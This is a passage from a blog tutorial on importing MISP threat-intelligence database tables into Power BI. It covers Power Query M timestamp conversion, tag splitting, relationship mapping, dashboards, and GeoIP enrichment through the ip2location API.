  • misp.galaxy_elements
  • misp.object_references
  • misp.objects
  • misp.org_blocklists
  • misp.organisations
  • misp.over_correlating_values
  • misp.sightings
  • misp.tags
  • misp.warninglist_entries
  • misp.warninglists

As you will see in the table selection dialog box, there are a lot of tables to choose from and we need most of them so that we can do drill downs, filters, etc. Do be careful if you decide to pull in tables like misp.users, misp.auth_keys, or misp.rest_client_histories, etc. These tables can contain sensitive data such as API keys and hashed passwords.

Column Data Types and Transforming Timestamps

Now, let’s start cleaning the data up for our purposes.

We are going to use a Power Query for this. To open Power Query Editor, look in the Ribbon for the Transform data button in the Queries section.

Transform Data Button

Click this and it will open the Power Query Editor window.

We will start with the first table in the Queries list on the left, misp attribute_tags. There are not many columns in this table, but it will help us go over some terminology.

Power Query

As shown in the screenshot above, Power BI has done some classification of data types in the initial ingest. We have four numeric columns and one boolean column. All of this looks to be correct and usable in this state. Let’s move on to a table that needs some work.

The very next table, misp attributes, needs some work. There are a lot more rows and columns in this table. In fact, this is probably the biggest table in MISP bar the correlations table, which is one reason we did not import that one.

At first glance, nothing seems to be amiss; that is until we scroll to the right and see the timestamp column.

Power Query Epoch Timestamp

If you recognize this long number, tip of the hat to you. If not, this is a UNIX timestamp, also known as an epoch timestamp. It is the duration of time since the UNIX epoch, which is January 1st, 1970 at 00:00:00 UTC. While this works fine in programs such as PHP, which powers MISP, tools such as Power BI need human-readable timestamp formats AND SO DO WE! So let’s make that happen.

What we are going to do is a one-step transform. This will remove the epoch timestamp column and replace it with a human-readable timestamp column that we can understand and so can the visualization filters of Power BI. This will give you the ability to filter by month, year, quarter, etc.

Power BI uses two languages called DAX and Power Query M. We will mainly be using Power Query M for this transformation work; DAX is used for data analysis, calculations, etc.

https://docs.microsoft.com/en-us/dax/dax-overview
https://docs.microsoft.com/en-us/powerquery-m/m-spec-introduction

Using Power Query M we are going to transform the timestamp column by calculating the duration since the epoch. So let’s do this with the timestamp column of the misp attributes table.

To shortcut some of the code creation we are going to use a built-in Transform called Extract Text After Delimiter. Select the Transform tab from the ribbon and then select Extract in the Text Column section of the ribbon. In the drop-down menu select Text After Delimiter. Enter any character in the Delimiter text field. I am going to use “1”. This will create the following code in the formula bar:

= Table.TransformColumns(#"Extract Text After Delimiter", {{"timestamp", each Text.AfterDelimiter(Text.From(_, "en-US"), "1"), type text}})
Formula Example

We are going to alter this command to get the result we want. Starting at the “(” sign, replace everything with:

misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Your formula bar should look like this:

= Table.TransformColumns(misp_attributes, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

And your column should have changed to a datetime type, little calendar/clock icon, and should be displaying a human readable values like in the screenshot below.

Timestamp Transformed

Do this with every epoch timestamp column you come across for all the tables. Make sure the epoch timestamp is already of type = numeric. If it is text you can use this code block to change it to numeric in the same step. Or add a type change step, then perform the transform as above.

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"timestamp", each #datetime(1970,1,1,0,0,0) +#duration(0,0,0,Number.From(_)), type datetime}})

If there are empty, 0, or null cells in your column then you can use the Power Query M (code/macro) command below and alter it as needed. Example of this would be the sighting_timestamp column or the first_seen and last_seen columns:

# Change <table_name> to the name of the table you are working on.
= Table.TransformColumns(<table_name>, {{"first_seen", each if _ = null then null else if _ = 0 then 0 else #datetime(1970,1,1,0,0,0) +#duration(0,0,0,_), type datetime}})

Using the last code block above that handles null and 0 values is probably the best bet overall so that you do not have errors when you encounter a cell that should have a timestamp but does not.

It is recommended to remove the first_seen and last_seen columns on the Attribute table as well. They are rarely used and cause more issues and errors than they add value. This is done in Power Query by right-clicking on the column name and selecting “Remove”.

Also remember to SAVE as you work. In the top left you will see the classic Save icon. This will trigger a pop-up saying that you have transforms that need to be applied. Approve this as you will have to before it saves. This will apply your new transforms to the dataset. With the attributes table, this may take a minute. Grab a coffee, we will wait…

Move on to the next table and so on. There is a lot of work up front with this ETL workflow, but the upkeep is usually minimal after the initial cleanup. Only additional fields or changes to the source data would be a reason to go back to these steps after they are complete. Enter the whole change control discussion and proper release notes on products and ….. OKAY moving on.

There may be an error in a field or two, but usually it is okay. Power BI will save any errors in a folder within Power Query Editor that you can review as needed.

Loading Tables With Transforms

Other Transforms

While you are doing the timestamp corrections on your tables, you may notice that there are other fields that could benefit from some alteration to make it easier to group, filter, etc. I will discuss some of them here, but of course you may find others; this is not an exhaustive list by any means.

Splitting Tags

So now that we have gone through each table and fixed all the timestamps, we can move on to other columns that might need adjustments. Our example will be the “misp tags” table. Navigate to the Power Query Editor again and select this table.

MISP Tags ETL

Look at the name column in the misp.tags table. From personal experience, there may come a time when you only want to display or filter on just the value of the tag and not the full tag name. We will split this string into its parts and also keep the original. Then we can do what we want with it.

Select the “name” column then in the Ribbon click the Add Column tab. Then click Extract, Text Between Delimiters. For the delimiter use a colon “:”. This will create a new column on the far right. Here is the formula that was auto-generated and creates the new column:

= Table.AddColumn(misp_tags, "Text After Delimiter", each Text.AfterDelimiter([name], ":"), type text)

We will add an if statement to deal with tags that are just standalone words. But we do not want to break the TLP or PAP tags, so we add that as well. You will have to play with this as needed as tags can change and new ones are added all the time. You can just add more else if checks to the instruction below. Changing the name of the column is as easy as replacing the string “Inserted Text After Delimiter” with whatever you want. I chose “Short_Tag_Name”. Comparer.OrdinalIgnoreCase tells Power Query M to use a case-insensitive comparer.

= Table.AddColumn(misp_tags, "Short_Tag_Name", each if Text.Contains([name], "tlp:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], "pap:", Comparer.OrdinalIgnoreCase) then [name] else if Text.Contains([name], ":") then Text.AfterDelimiter([name], ":") else [name])

Here is what you should have now. Yay!

MISP Tags Split ETL Results

Relationship Mapping

Why Auto Mapping in Power BI Doesn’t Work

Power BI tries to help you by finding commonalities in the tables you load and automatically building relationships between them. This is usually not correct, especially when the data comes from an application and was not purpose-built for reporting. We can tell Power BI to stop helping.

Let’s stop the madness.
Go to File, Options and settings, Options
Uncheck all the boxes in the “Relationships” section

Disable Auto Mapping

Once this is complete, click on the Manage relationships button under the Modeling tab of the Ribbon. Delete any relationships you see there.

Managing Relationships

Once your panel looks like the one above, click New…
We can create the relationship using this selection panel…

Create a Relationship

We can also use the graphical method. You can get to the graph by closing the Create and Manage relationship windows and clicking on the Model icon on the left of the Power BI workspace.

Managing Relationships Graphically
Relationship Map

Here we can drag and drop connectors between tables. Depending on your style, you may like one method over the other. I prefer the drag and drop method. To each their own.

Process to Map Tables

To map the relationships of these tables, you need to know a little about MISP and how it works.

  • Events in MISP can have tags, objects, attributes, galaxies (basically groups of tags), and must be created by an organization.
  • Attributes can have tags and sightings.
  • Objects are made up of Attributes
  • Warninglists are not directly related but can match against Attributes
  • Events and Organizations can be blocked by being placed on a corresponding blocklist
  • There is a table called over_correlating_values that tracks attributes that are very common between many events.

Using this information and user knowledge of MISP, you can map what relates to what. Most tables have an “id” column that is the key of that table. For instance, the tags table column “id” is related to the “tag_id” column of the event_tags table. To make this easier you can rename the “id” column of the tags table to “tag_id” so that it matches. You will have to go through this process with all the tables. There will be relationships that are not “active”. This happens when multiple relationships per table would create ambiguity in the model; ambiguity meaning uncertainty about which relationship the software should choose, and it does not like this. So for the model’s sake, you have to pick which one is active by default if there is a conflict. You can use DAX when making visualizations to temporarily activate an inactive relationship if you need to. Great post on this here: https://www.vivran.in/post/understanding-ambiguity-in-power-bi-data-model
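If you prefer to do that rename as a Power Query step instead of clicking through the column headers, it is a one-liner. A minimal sketch, assuming the tags query is named misp_tags as in the formulas earlier:

// Rename the key column so it lines up with event_tags.tag_id
= Table.RenameColumns(misp_tags, {{"id", "tag_id"}})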

Personally, relationship mapping was the most tedious part for me. But once it is done you should not have to change it again.

Examples of a Relationship Map

Here is what the relationship model should look like when you are done. Now we can start building visualizations!

Example of a Complete Relationship Map

I will leave the rest of the relationship mapping as an exercise for you. It will also help you better understand how MISP uses all this data.

Later we will talk about Power BI templates and the one we are providing to the community.

Making your first visualization

What do you want to visualize

At this stage you have to start looking at your Primary Intelligence Requirements (PIR). Why are you doing this work? What is the question you are answering and who is asking the question?

For example, if your CISO is asking for a constantly updating dashboard of key metrics around the CTI Program then your requirement is just that. You can fulfill this requirement with Power BI Desktop and Power BI Service. So as a first step we need to create some visualizations that will provide insights into the operational status of the CTI program.

Count all the things

To start off easy, we will just make some charts that count the number of Events and Attributes that are currently in our MISP instance during a certain time window.
To do this we will go back to Power BI Desktop and the Report workspace.

Starting to Create a Visualization

So let’s start with Events and display them in a bar chart over time. Expand the misp events table in the Fields panel on the left and check the box next to event_id. This will place that field in the X-axis; drag it down to the Y-axis, which will change it to a count. Then select the Date field in the Events table. This will create the bar chart in the screenshot below. You will have to resize it by dragging a corner of the chart, as you would with any other window.

Histogram Example
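If you ever want to sanity-check the counts the visual shows, you can compute the same aggregation in Power Query. This is only a minimal sketch; the query name misp_events and the Date column are assumptions, so rename them to match your own model:

let
    // Query and column names are assumptions; adjust to your model
    Source = misp_events,
    // Bucket each event into the first day of its month
    #"Added Month" = Table.AddColumn(Source, "Month", each Date.StartOfMonth(Date.From([Date])), type date),
    // Count events per month; these totals should match the bar chart
    #"Event Counts" = Table.Group(#"Added Month", {"Month"}, {{"EventCount", each Table.RowCount(_), Int64.Type}})
in
    #"Event Counts"

If the totals here and in the visual disagree, check your filters and relationships before trusting either number.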

We need to filter down to the year the Event was created. Drag Year from the Date field hierarchy over to the Filter on all pages panel. Then change the filter type to basic and select the last 5 years to get a smaller dataset. This will differ depending on the amount and age of your MISP dataset.

Filtering Visuals

Nice. Now there is a thing that Power BI does that will be annoying. If you look at data over a long period of time it will, by default, group all of the data by the current view’s bucket, ignoring any higher order bucket. That probably makes no sense, so here is an example: if you are looking at data over two years and then want to see how many events per month, it will combine the two years and show you a single total for each of the months Jan-Dec. It also concatenates the labels by default. See below; this is five years of data, but it is only showing the sum of all events that happened in each month across those five years.

Time Buckets Not Correct

To change this, click on the forked arrow to the left of the double arrow highlighted in the screenshot above. This will split the hierarchy. You will have to drill up to the highest level of the hierarchy first using the single up arrow; click it until you are at years only. We can also turn off label concatenation. See the highlighted areas in the screenshot below. Now this is more like it!

Time Buckets Correctly Configured

Using a Slicer as a time filter

Now we need an easier way to change the date range that we are viewing. Let’s add a Slicer for that! Drag the Slicer visualization onto the canvas. You can let it live on top of the existing visualization or reorganize things. Now drag the Date field of the event table into the new visualization. You should be left with a slider that can filter the main visualization. Awesome. See the example below.

Slicer Example

You can also change the way the Slicer looks or operates with the options menu in the top right. See below.

Different Types of Slicers

Ask questions about your data

Let’s add some additional functionality to our report. Click on the three dots, … , in the visualization selection panel. Then click Get More Visuals, search for Text Filter by Microsoft, and add it to your environment. Then add it and the Q&A visualization to your canvas. To use the Text Filter you need to give it fields to search in. Add the value1 field from the attributes table; this is the main field in the attributes table that stores your indicator of compromise, or IoC for short.

Text Filter

After you rearrange some stuff to make everything fit, ask the following question in your Q&A visual, “How many attribute_id are there?”. Give it a minute and you should get back a count of the number of attributes in the dataset. Nice!

Now do a Text Search in that visual for an IP you know is in your MISP instance. I know we have the infamous 8.8.8.8 in ours, IDS flag set to false of course :). The text search will filter the Q&A answer and show you how many times that value is seen in your dataset. It also filters your bar chart to show you when the events containing that data were created! If your bar chart doesn’t change, check your relationship maps; it might be the filtering direction. Play with this until your data behaves the way you need it to. Imagine the capabilities of this if you get creative! You can also mess with the built-in design templates to make this sexier, or you can manually change backgrounds, borders, etc.

Example Visuals

Add in Geo-location data

Before we start: Sign up for a free account here: https://www.ip2location.io/

Record your API key; we will use it soon.

Let’s also create a new transform that will add GeoIP data to the IP addresses in our attributes table.

We are going to start by creating a new table with just IP attributes.

Click on Transform data in the Ribbon. Then right click on the misp attributes table.

Duplicate the table and then right click on the new table and select rename. I renamed mine “misp ip_addresses_last_30_days_geo”.

Now we are going to do some filtering to shrink this table down to the last 30 days’ worth of IP attributes. If we did not do this, we might burn through our API credits due to the number of IPs in our MISP instance. Of course, you can change the date range as needed for your use case.

Right click the “type” column and filter to just ip-src and ip-dst.

Selecting Attribute Types to Filter Column

Then filter to the last 30 days. Right click the timestamp column and open Date/Time Filters > In the Previous…

Filter Tables by Time

In the dialog box, enter your time frame. I entered the last 30 days, as below.

Filtering to the Last 30 Days
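Put together, the filter steps in the duplicated query end up looking roughly like the M below. This is a sketch of what the UI generates for these clicks; the Source step stands in for the duplicated misp attributes table, and the “type” and “timestamp” column names come from the MISP schema, so adjust as needed:

let
    // Source stands for the duplicated misp attributes table (name assumed)
    Source = misp_attributes,
    // Keep only IP attributes
    #"Filtered Types" = Table.SelectRows(Source, each [type] = "ip-src" or [type] = "ip-dst"),
    // Keep only the last 30 days so we do not burn API credits
    #"Filtered Last 30 Days" = Table.SelectRows(#"Filtered Types", each Date.IsInPreviousNDays([timestamp], 30))
in
    #"Filtered Last 30 Days"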

Then we are going to follow the instructions that can be found at the following blog: https://www.fourmoo.com/2017/03/14/power-bi-query-editor-getting-ip-address-details-from-ip-address/

In that blog you create a custom function like the one below. Follow the instructions in that blog, it is a great read.

fn_GetIPAddressDetails

let
    Source = (#"IP Address" as text) =>
        let
            Source = Json.Document(Web.Contents("https://api.ip2location.io/?ip=" & #"IP Address" & "&key=<ip2location_api_key>")),
            #"Converted to Table" = Record.ToTable(Source),
            #"Transposed Table" = Table.Transpose(#"Converted to Table"),
            #"Promoted Headers" = Table.PromoteHeaders(#"Transposed Table")
        in
            #"Promoted Headers"
in
    Source

Once you have this function saved, you can use it to create a new set of columns in your new IP address table, the one we named “misp ip_addresses_last_30_days_geo” earlier. Use the value1 column as the argument of the function.
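If you prefer to see that as code, the invocation ends up roughly like the steps below (the Add Column, Invoke Custom Function button produces something similar). The expanded field names are assumptions based on a typical ip2location.io response, so adjust them to whatever fields your plan returns:

let
    // Continuing from the filtered IP query; step name assumed
    Source = #"Filtered Last 30 Days",
    // Call the custom function once per row, passing the IoC value
    #"Added GeoIP" = Table.AddColumn(Source, "GeoIP", each fn_GetIPAddressDetails([value1])),
    // Expand the returned table into columns (field names assumed)
    #"Expanded GeoIP" = Table.ExpandTableColumn(#"Added GeoIP", "GeoIP", {"country_code", "country_name", "city_name", "latitude", "longitude"})
in
    #"Expanded GeoIP"

Keep an eye on row counts here: every row triggers an API call, which is exactly why we filtered the table down to the last 30 days first.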

Example of GeoIP locations and Text Filter on Tag Name

Sharing with the community

On the NVISO CTI GitHub page, you will find a Power BI template file that has all the Power BI related steps above already done for you. All you have to do is change the data source to your MISP instance and get an API key for https://www.ip2location.io/.

Download the template file located here: https://github.com/NVISOsecurity/nviso-cti/tree/master/Power_BI

Use the import function under the File menu in the Power BI Desktop ribbon.

Import Function

Import the template. There will be errors because you have not specified your data source yet. Cancel the login dialog box and close the Refresh dialog box; it will show the IP of my dev MISP, so you will need to point it at your own data source. Select Transform data in the ribbon and then Data source settings. Here you can edit the source information and add your credentials. (Make sure you have configured your MISP instance for remote MySQL access and installed the MySQL .NET connector.)

Close Prompt to Update Creds
Change Data Source
Accessing Source Settings
Change MySQL Source
Adding Your Creds 1

Make sure you set the encryption checkbox as needed.

Adding Your Creds 2

Select Transform Data in the ribbon again and then Transform data to open the Power Query editor.

Accessing Power Query to Edit Custom Function

Then select the custom function for geoip and use the Advanced Editor to add your API key.

Add Your API Key

Now, if your data source settings and credentials are correct, you can Close & Apply and it should start pulling in the data from your configured MISP instance.

Conclusion

A note of caution with all this: check your source data to make sure what you are seeing in Power BI matches what you see in MISP. As my brother-in-law and data analytics expert, Joshua Henderson, says: “Always validate that your outcome in Power BI/Tableau is correct for what you have in the DB. I will either already know what the outcome should be in my viz tool, or I will do it after I create my viz. Far too often I see data counts off, and it can be as small as a mis-click on a filter, or as bad as your mapping being off and you are dropping a large percentage of, say, attribute_ids. It also can help you with identifying issues, either with your database not updating correctly or an issue with your data refresh settings.”

Now that you have built your first visualization, I will leave it to you to build more, and I would love to see what you come up with. In the next blog I will demonstrate how to publish this data to the Power BI Service and use the Data Gateway to automate dataset refresh jobs! Once published to the Power BI Service you will be able to share your reports and create and share dashboards built from individual visuals in your reports. You can even view all of this on your phone!!

I also leave you with this idea. Now that your MISP data is in Power BI, what other data can you pull into Power BI to pair with this data? SIEM data? Data from your XDR/EDR? Data from your SOC’s case management solution? Data from your vulnerability management platform? You get the idea!

Until next time!

Thanks for reading!!!
Robert Nixon
@syloktools

Rock On!